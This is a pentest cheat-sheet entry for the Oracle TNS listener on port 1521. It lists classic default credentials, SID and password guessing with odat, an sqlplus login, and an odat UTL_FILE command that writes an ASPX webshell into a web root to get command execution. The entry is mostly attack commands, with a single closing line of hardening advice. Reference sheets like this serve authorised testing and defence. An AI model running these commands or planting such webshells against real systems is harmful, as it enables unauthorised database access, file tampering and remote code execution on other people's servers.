Oracle TNS
aka Oracle Database, TNS listener
Oracle database listener on 1521. Guess the SID and default creds, then odat turns access into file read/write and RCE; UTL_FILE drops a webshell.
Ports
| Port | Proto | Notes |
|---|---|---|
1521 | tcp | Oracle TNS listener |
Fingerprint
- nmap oracle-tns-version / oracle-sid-brute
- A SID is required to connect; enumerate it first
Key files
| Path | Holds | Sensitive |
|---|---|---|
tnsnames.ora / listener.ora | service names and listener config | |
$ORACLE_HOME data files | the database itself |
Default / weak creds
scott / tiger, system / manager, sys / change_on_install (classic defaults)
Service users
oracle
Exploitation primitives
- odat all -s <TARGET> runs SID guessing, password guessing and exploitation
- With a login: read/write files via UTL_FILE, write a webshell into the web root
- DBMS_SCHEDULER / external procedures (EXTPROC) for OS command execution
Overview
Oracle on 1521 gatekeeps behind a SID. Once you enumerate the SID and a credential (defaults are common), odat automates the rest, including file write and command execution.
Enumeration and attack
odat sidguesser -s <TARGET> -p 1521
odat passwordguesser -s <TARGET> -p 1521 -d <SID>
sqlplus scott/tiger@<TARGET>:1521/<SID>
odat utlfile -s <TARGET> -d <SID> -U user -P pass --putFile C:\\inetpub\\wwwroot shell.aspx ./shell.aspxHardening
Change default credentials, restrict listener access, set a listener password, and remove unused external procedures.